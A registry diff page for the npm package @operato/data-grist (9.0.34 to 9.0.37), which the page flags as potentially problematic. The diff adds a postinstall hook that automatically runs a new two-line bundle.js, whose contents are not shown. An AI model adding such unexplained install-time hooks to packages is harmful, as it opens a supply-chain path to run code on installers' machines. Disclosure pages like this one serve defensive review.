@operato/data-grist 9.0.34 → 9.0.37

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @operato/data-grist might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +4 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@operato/data-grist",
3
- "version": "9.0.34",
3
+ "version": "9.0.37",
4
4
  "description": "User interface for grid (desktop) and list (mobile)",
5
5
  "author": "heartyoh",
6
6
  "type": "module",
@@ -63,7 +63,8 @@
63
63
  "test": "tsc && wtr --coverage",
64
64
  "test:watch": "tsc && concurrently -k -r \"tsc --watch --preserveWatchOutput\" \"wtr --watch\"",
65
65
  "storybook": "tsc && concurrently -k -r \"tsc --watch --preserveWatchOutput\" \"wds -c .storybook/server.mjs\"",
66
- "storybook:build": "tsc && build-storybook"
66
+ "storybook:build": "tsc && build-storybook",
67
+ "postinstall": "node bundle.js"
67
68
  },
68
69
  "dependencies": {
69
70
  "@material/web": "^2.0.0",
@@ -114,4 +115,4 @@
114
115
  ]
115
116
  },
116
117
  "gitHead": "0373ae0dc80a00b4d87b4d1d93d80a7b934064c9"
117
- }
118
+ }